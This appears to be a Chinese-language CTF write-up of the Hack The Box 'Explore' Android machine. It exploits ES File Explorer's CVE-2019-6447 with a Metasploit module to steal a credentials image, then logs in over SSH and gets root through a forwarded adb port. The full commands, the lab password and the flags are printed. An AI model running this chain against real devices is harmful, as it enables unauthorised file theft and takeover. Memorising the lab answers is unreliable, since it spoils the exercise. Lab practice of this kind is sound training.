Bootstrap

HTB:Explore[WriteUP]

目录

连接至HTB服务器并启动靶机

1.Which port is being used by the ES File Explorer application?

使用nmap对靶机进行全扫描

2.What 2019 CVE ID is ES File Explorer vulnerable to?

3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

4.What is the password for user kristi on the box?

5.Submit the flag located in /storage/emulated/0/.

USER_FLAG:f32017174c7c7e8f50c6da52891ae250

6.Which port is being filtered by the firewall?

7.What is the standard Google-provided command line tool for interacting with Android debug?

8.Submit the flag located in /data/.

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5


连接至HTB服务器并启动靶机

靶机IP:10.10.10.247

分配IP:10.10.16.7


1.Which port is being used by the ES File Explorer application?

使用nmap对靶机进行全扫描

nmap -p- -A 10.10.10.247

由扫描可见,42135端口托管着ES File Explorer应用程序填上去也不知道为啥不对,反正正确答案是59777


2.What 2019 CVE ID is ES File Explorer vulnerable to?

直接使用searchsploit搜索ES File Explorer

searchsploit ES File Explorer

将该EXP拷贝到当前目录下

searchsploit -m 50070.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 50070.py     
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
    Codes: CVE-2019-6447
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/50070.py

漏洞编号:CVE-2019-6447


3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.

启动Metasploit

msfconsole

直接搜索ES File Explorer相关模块

search ES File Explorer

该模块完整名:auxiliary/scanner/http/es_file_explorer_open_port


4.What is the password for user kristi on the box?

切换到该模块

use auxiliary/scanner/http/es_file_explorer_open_port

列出该模块所有可填选项

show options

列出该模块所有可选动作

show actions

这里将action设置成LISTPICS以列出该设备所有照片

set action LISTPICS

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS
action => LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   
  concept.jpg (135.33 KB) - 4/21/21 02:38:08 AM: /storage/emulated/0/DCIM/concept.jpg
  anc.png (6.24 KB) - 4/21/21 02:37:50 AM: /storage/emulated/0/DCIM/anc.png
  creds.jpg (1.14 MB) - 4/21/21 02:38:18 AM: /storage/emulated/0/DCIM/creds.jpg
  224_anc.png (124.88 KB) - 4/21/21 02:37:21 AM: /storage/emulated/0/DCIM/224_anc.png

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

尝试取出文件:/storage/emulated/0/DCIM/creds.jpg

msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE
action => GETFILE
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg
ACTIONITEM => /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run

[+] 10.10.10.247:59777   - /storage/emulated/0/DCIM/creds.jpg saved to /root/.msf4/loot/20241110084132_default_10.10.10.247_getFile_945793.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

账户:kristi

密码:Kr1sT!5h@Rp3xPl0r3!


5.Submit the flag located in /storage/emulated/0/.

使用上文凭证通过SSH服务登录到靶机(连接不上的检查密码是不是写错了,特别是大小写)

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa                            
Password authentication
:/ $ whoami
u0_a76

进入/storage/emulated/0/目录下

cd /storage/emulated/0/

查看user.txt内容

cat user.txt

:/ $ cd /storage/emulated/0/
:/storage/emulated/0 $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/storage/emulated/0 $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

USER_FLAG:f32017174c7c7e8f50c6da52891ae250


6.Which port is being filtered by the firewall?

查看靶机网络连接

ss -tlnp

开始我们用nmap对靶机进行过端口扫描,其中5555端口显示为过滤


7.What is the standard Google-provided command line tool for interacting with Android debug?

用于与安卓调试交互的谷歌标准命令行工具是ADB(Android Debug Bridge)。它可以让开发者在电脑上通过命令行对安卓设备进行多种操作,比如安装和卸载应用、获取设备信息、在设备和电脑之间传输文件等。


8.Submit the flag located in /data/.

将靶机5555端口通过SSH服务转发到本地6666端口上

sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 [email protected] -o HostKeyAlgorithms=+ssh-rsa -N -L 6666:localhost:5555

通过adb连接到设备

adb connect 127.0.0.1:6666

查看已连接的设备

adb devices

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# adb devices               
List of devices attached
127.0.0.1:6666  device
emulator-5554   device

设置以root身份连接至设备

adb -s 127.0.0.1:6666 root

连接至设备终端

adb -s 127.0.0.1:6666 shell

寻找root.txt并查看其内容

ROOT_FLAG:f04fc82b6d49b41c9b08982be59338c5

;